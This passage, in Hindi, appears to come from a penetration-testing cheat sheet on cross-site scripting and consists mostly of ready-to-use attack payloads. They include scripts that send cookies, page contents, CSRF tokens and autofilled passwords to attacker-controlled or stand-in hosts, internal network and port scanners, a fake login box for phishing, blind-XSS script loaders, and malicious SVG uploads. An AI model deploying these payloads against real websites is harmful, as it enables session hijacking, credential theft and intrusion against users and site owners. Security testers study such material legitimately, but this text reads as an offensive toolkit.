(ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟΘﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟΘﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) ('_');

// It's also possible to execute JS code only with the chars: []`+!${}

XSS सामान्य पेलोड

1 में कई पेलोड

pageSteal Info JS

कुकीज़ पुनः प्राप्ति

<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>

यदि कुकी में HTTPOnly फ्लैग सेट है तो जावास्क्रिप्ट से कुकी तक पहुंच नहीं पाएंगे। लेकिन यदि आप भाग्यशाली हैं तो आपके पास इस सुरक्षा को दौर करने के कुछ तरीके हैं।

पृष्ठ सामग्री चुराना

var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
var attacker = "http://10.10.14.8/exfil";
var xhr  = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open('GET', url, true);
xhr.send(null);

आंतरिक आईपी पते खोजें

<script>
var q = []
var collaboratorURL = 'http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net';
var wait = 2000
var n_threads = 51

// Prepare the fetchUrl functions to access all the possible
for(i=1;i<=255;i++){
q.push(
function(url){
return function(){
fetchUrl(url, wait);
}
}('http://192.168.0.'+i+':8080'));
}

// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for(i=1; i<=n_threads; i++){
if(q.length) q.shift()();
}

function fetchUrl(url, wait){
console.log(url)
var controller = new AbortController(), signal = controller.signal;
fetch(url, {signal}).then(r=>r.text().then(text=>
{
location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'&code='+encodeURIComponent(text)+'&'+Date.now()
}
))
.catch(e => {
if(!String(e).includes("The user aborted a request") && q.length) {
q.shift()();
}
});

setTimeout(x=>{
controller.abort();
if(q.length) {
q.shift()();
}
}, wait);
}
</script>

पोर्ट स्कैनर (फेच)

const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }

पोर्ट स्कैनर (वेबसॉकेट्स)

var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i<ports.length; i++) {
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
}

छोटे समय किसी प्रतिक्रियाशील पोर्ट को दर्शाते हैं लंबे समय कोई प्रतिक्रिया नहीं दर्शाते हैं।

Chrome में प्रतिबंधित पोर्टों की सूची की समीक्षा यहाँ और Firefox में यहाँ।

पहचान प्रमाण पूछने के लिए बॉक्स

<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>

पासवर्ड भरने का अटो-भराई लेना

<b>Username:</><br>
<input name=username id=username>
<b>Password:</><br>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

जब कोई डेटा पासवर्ड फील्ड में दर्ज किया जाता है, तो उपयोगकर्ता का उपयोगकर्ता नाम और पासवर्ड हमलावर के सर्वर पर भेजा जाता है, यदि उपयोगकर्ता कोई सहेजा हुआ पासवर्ड चुनता है और कुछ नहीं लिखता है तो पहुंचाने की प्रक्रिया होगी।

कीलॉगर

गिथब में खोज करते समय मैंने कुछ विभिन्न पाया:

https://github.com/JohnHoder/Javascript-Keylogger
https://github.com/rajeshmajumdar/keylogger
https://github.com/hakanonymos/JavascriptKeylogger
आप मेटास्प्लॉइट भी उपयोग कर सकते हैं http_javascript_keylogger

CSRF टोकन चुराना

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

PostMessage संदेश चुराना

<img src="https://attacker.com/?" id=message>
<script>
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
</script>

ब्लाइंड एक्सएसएस पेलोड्स

आप यह भी उपयोग कर सकते हैं: https://xsshunter.com/

"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>

<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>

<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">

<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>

<!-- html5sec -  allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags  -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!--  html5sec - eventhandler -  element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known.  -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>

<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload&#61;&#61; onerror=eval(atob(this.id))>

<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload&#61;&#61; autofocus>

<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">

<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

Regex - छिपी हुई सामग्री तक पहुंचें

From this writeup it's possible to learn that even if some values disappear from JS, it's still possible to find them in JS attributes in different objects. For example, an input of a REGEX is still possible to find it after the value of the input of the regex was removed:

// Do regex with flag
flag="CTF{FLAG}"
re=/./g
re.test(flag);

// Remove flag value, nobody will be able to get it, right?
flag=""

// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"])

ब्रूट-फोर्स सूची

Auto_Wordlists/xss.txt at main · carlospolop/Auto_WordlistsGitHub

अन्य सुरक्षा दोषों का दुरुपयोग करना XSS

मार्कडाउन में XSS

Can inject Markdown code that will be renderer? Maybe you you can get XSS! Check:

pageXSS in Markdown

XSS to SSRF

Got XSS on a site that uses caching? Try upgrading that to SSRF through Edge Side Include Injection with this payload:

<esi:include src="http://yoursite.com/capture" />

Use it to bypass cookie restrictions, XSS filters and much more! इसका उपयोग कुकी प्रतिबंध, XSS फ़िल्टर और बहुत कुछ द्वारा छलकरी करने के लिए करें! इस तकनीक के बारे में अधिक जानकारी यहाँ: XSLT.

XSS में डायनामिक बनाई गई PDF

यदि एक वेब पृष्ठ उपयोगकर्ता नियंत्रित इनपुट का उपयोग करके एक PDF बना रहा है, तो आप बॉट को धोखा देने की कोशिश कर सकते हैं जो PDF बना रहा है किसी अर्बिट्रे JS कोड को क्रियान्वित करने में। तो, अगर PDF निर्माता बॉट कोई प्रकार के HTML टैग पाता है, तो वह उन्हें व्याख्या करेगा, और आप इस व्यवहार का दुरुपयोग कर सकते हैं जिससे एक सर्वर XSS का कारण बन सकता है।

pageServer Side XSS (Dynamic PDF)

यदि आप HTML टैग इंजेक्ट नहीं कर सकते हैं तो यह योग्य हो सकता है कि आप PDF डेटा इंजेक्ट करने की कोशिश करें:

pagePDF Injection

Amp4Email में XSS

AMP, जो मोबाइल उपकरणों पर वेब पृष्ठ प्रदर्शन को तेजी से बढ़ाने का लक्ष्य रखता है, HTML टैगों को जेएस के साथ पूरक करता है ताकि फ़ंक्शनैलिटी को सुनिश्चित किया जा सके जिसमें गति और सुरक्षा पर जोर दिया गया है। यह विभिन्न सुविधाओं के लिए विभिन्न घटकों का समर्थन करता है, जिनका उपयोग AMP components के माध्यम से किया जा सकता है।

AMP for Email प्रारूप विशिष्ट AMP घटकों को ईमेलों में विस्तारित करता है, जिससे प्राप्तकर्ताओं को अपने ईमेल के अंदर सीधे सामग्री के साथ बातचीत करने की संभावना होती है।

उदाहरण Gmail में Amp4Email में XSS लेखन.

फ़ाइलें अपलोड करते समय XSS (svg)

एक छवि के रूप में एक फ़ाइल अपलोड करें जैसे निम्नलिखित (से http://ghostlulz.com/xss-svg/):

Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>

<svg width="500" height="500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>

<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,&lt;body&gt;&lt;script&gt;document.body.style.background=&quot;red&quot;&lt;/script&gt;hi&lt;/body&gt;" width="400" height="250"/>
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
</foreignObject>
</svg>

<svg><use href="//portswigger-labs.net/use_element/upload.php#x"/></svg>

<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' &gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />

खोजें https://github.com/allanlw/svg-cheatsheet में अधिक SVG पेलोड।

विविध JS ट्रिक्स और संबंधित जानकारी

pageMisc JS Tricks & Relevant Info

XSS संसाधन

यदि आप हैकिंग करियर में रुचि रखते हैं और अनहैकेबल को हैक करना चाहते हैं - हम नियुक्ति कर रहे हैं! (चुस्त पोलिश लिखने और बोलने की आवश्यकता है).